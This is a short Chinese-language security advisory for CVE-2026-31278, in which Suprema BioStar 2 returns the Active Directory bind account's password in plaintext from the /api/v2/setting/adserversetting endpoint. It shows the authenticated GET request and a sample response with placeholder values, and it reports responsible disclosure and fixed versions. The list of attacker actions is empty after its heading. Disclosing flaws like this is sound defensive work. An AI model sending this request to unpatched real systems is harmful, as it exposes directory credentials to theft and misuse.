| 字段 | 详情 |
|---|---|
| CVE ID | CVE-2026-31278 |
| 厂商 | Suprema Inc. |
| 产品 | BioStar 2 |
| 漏洞类型 | 敏感信息泄露 / 凭据暴露 |
| 攻击向量 | 远程 / 已认证 / 低复杂度 |
| 严重性 | 高危 |
| 修复版本 | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| 研究人员 | Abdullah Alannaz |
Suprema BioStar 2 存在一个敏感信息泄露漏洞,原因在于其对 Active Directory 集成设置的处理不当。后端 API 端点 /api/v2/setting/adserversetting 以明文形式返回 Active Directory 绑定账户的凭据,尽管该密码在管理界面中已被掩码显示。
尽管密码字段在管理界面中已被掩码,但向后端 API 发出的已认证请求会泄露完整的未加密密码以及 LDAP 配置参数,其中包括禁用 SSL 通信的设置。
已认证的攻击者向 AD 服务器配置端点发送 HTTP GET 请求,即可在服务器响应中收到明文形式的 Active Directory 服务账户密码。
请求:
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
响应:
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
已认证的攻击者可利用泄露的凭据进行以下操作:
CVE-2026-31278 由 MITRE 分配 | 修复版本 BioStar 2 v2.9.12 / BioStarX v1.0.2 已发布 |
Abdullah Alannaz 安全研究人员
该漏洞已向 Suprema 进行负责任披露。厂商确认了该问题,并与 MITRE 协调完成了 CVE 分配。